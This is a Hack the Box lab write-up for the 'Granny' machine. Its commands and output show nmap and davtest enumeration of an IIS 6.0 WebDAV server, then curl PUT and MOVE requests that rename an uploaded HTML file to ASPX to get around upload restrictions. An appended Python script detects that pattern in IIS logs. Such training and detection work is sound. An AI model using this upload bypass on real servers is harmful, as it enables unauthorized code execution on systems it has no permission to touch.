Hack the Box Windows / Granny

Scanning and Enumeration

Scanning

root@kali:/home/kali# nmap -sC -sV -p 80 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-24 00:24 EST
Nmap scan report for 10.10.10.15
Host is up (0.092s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Tue, 24 Nov 2020 05:32:22 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

The scan shows that the HTTP PUT method is allowed, which may give us the ability to save files on the web server. Since this is a Microsoft IIS web server, the file types it executes are ASP and ASPX.

root@kali:/home/kali# davtest --url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: NHiJopznpIc5RJ
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ
********************************************************
 Sending test files
PUT     asp     FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jhtml
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.cfm
PUT     aspx    FAIL
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.pl
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.php
PUT     shtml   FAIL
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jsp
********************************************************
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    cfm     FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
EXEC    pl      FAIL
EXEC    php     FAIL
EXEC    jsp     FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jhtml
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.cfm
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.pl
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.php
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jsp
Executes: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
Executes: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html

ASP and ASPX uploads are not allowed, but TXT and HTML files are. Recall that PUT was not the only HTTP method the scan reported: the MOVE method is also available. MOVE can change a file's location on the web server and can also be used to rename a file. Let's upload an HTML file to the web server and then rename it so that its extension becomes ASPX.

root@kali:~/Desktop/HTB/Granny# curl -X PUT http://10.10.10.15/test.html -d @test.html
root@kali:~/Desktop/htb/granny# curl http://10.10.10.15/test.html
<h1>Hello</h1>

Changing the Extension

root@kali:~/Desktop/htb/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
root@kali:~/Desktop/htb/granny# curl http://10.10.10.15/test.aspx
<h1>Hello</h1>

This confirms that we can upload ASPX code on the server.
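As a defender-side complement to the PUT/MOVE steps above, here is an added example (not part of the original write-up) that reads IIS W3C extended log lines, flags the write-capable WebDAV methods the nmap scan reported, and pairs each successful PUT with a later MOVE of the same path, which is the rename signature shown on this page. The log lines are constructed for the example; the field layout and the client IP are assumptions.

```python
"""Flag WebDAV write activity in IIS W3C extended logs (added example)."""

# Write-capable subset of the "potentially risky" methods from the nmap scan;
# any of these lets a client alter content on the server.
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL",
                        "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample log; the #Fields layout and client IP are assumptions.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2020-11-24 05:32:22
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-11-24 05:32:22 10.10.14.5 GET / 200
2020-11-24 05:32:25 10.10.14.5 OPTIONS / 200
2020-11-24 05:32:30 10.10.14.5 MKCOL /DavTestDir_NHiJopznpIc5RJ 201
2020-11-24 05:32:31 10.10.14.5 PUT /DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.aspx 403
2020-11-24 05:32:32 10.10.14.5 PUT /DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt 201
2020-11-24 05:33:10 10.10.14.5 PUT /test.html 201
2020-11-24 05:33:12 10.10.14.5 GET /test.html 200
2020-11-24 05:33:40 10.10.14.5 MOVE /test.html 201
2020-11-24 05:33:42 10.10.14.5 GET /test.aspx 200
"""


def parse_w3c(log_text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # no header yet or malformed row: skip rather than misalign
        rows.append(dict(zip(fields, values)))
    return rows


def webdav_writes(rows):
    """Return every request (successful or not) that used a write method."""
    return [r for r in rows if r["cs-method"] in WEBDAV_WRITE_METHODS]


def put_then_move(rows):
    """Pair each successful PUT with a later MOVE of the same path by the same
    client. IIS does not log the Destination header, so the rename target is
    not visible; the PUT-then-MOVE sequence itself is the signal."""
    put_times, hits = {}, []
    for r in rows:
        key = (r["c-ip"], r["cs-uri-stem"])
        if r["cs-method"] == "PUT" and r["sc-status"].startswith("2"):
            put_times[key] = r["time"]
        elif r["cs-method"] == "MOVE" and key in put_times:
            hits.append((r["c-ip"], r["cs-uri-stem"], put_times[key], r["time"]))
    return hits
```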
